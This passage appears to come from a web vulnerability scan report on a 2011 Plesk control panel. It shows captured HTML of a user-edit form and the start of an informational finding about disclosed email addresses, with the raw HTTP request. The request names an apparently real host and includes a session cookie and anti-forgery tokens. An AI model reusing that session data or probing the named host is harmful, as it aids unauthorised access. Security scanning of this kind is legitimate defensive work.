items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F4' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="fdf080d9224fd0d18957a62c" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="fdf080d9224fd0d18957a62c@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/user/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:54 GMT
Connection: close
Content-Length: 14316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="ac96ec24fae152c446439f0afde39de7" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
